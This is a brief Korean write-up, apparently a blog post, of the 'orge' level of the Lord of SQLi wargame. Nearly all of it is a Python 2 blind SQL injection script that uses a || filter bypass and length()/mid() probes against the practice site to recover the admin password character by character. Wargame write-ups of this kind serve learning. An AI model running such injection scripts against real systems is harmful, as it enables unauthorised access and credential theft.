서론
NULL
진행과정
Darkelf와 마찬가지로 ||를 이용해 우회한 뒤, Blind SQLi이용.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | import httplib, urllib conn = httplib.HTTPConnection("los.eagle-jump.org") URL = "/orge_40d2b61f694f72448be9c97d1cea2480.php?pw=" Headers={"Cookie":"PHPSESSID=s3kvsj2f9dq4c4ke7b0qmfaic6"} length = 0 PW = "" for i in range(1, 20) : payload = "pw=%27%20||%20id=%27admin' %26%26 " + "length(pw)='"+str(i)+"#" conn.request("GET", URL+payload, "", Headers) k = conn.getresponse().read() if "Hello admin" in k : print "length = %d" % i length = i break for i in range(1, length+1) : for j in range(48, 123) : payload = "pw=' || id='admin' %26%26" + "mid(pw,"+str(i)+",1)='"+ chr(j) +"#" conn.request("GET", URL+payload, "", Headers) k = conn.getresponse().read() if "Hello admin" in k : PW += chr(j) print "PW = %s" % PW break | cs |
# REF
NULL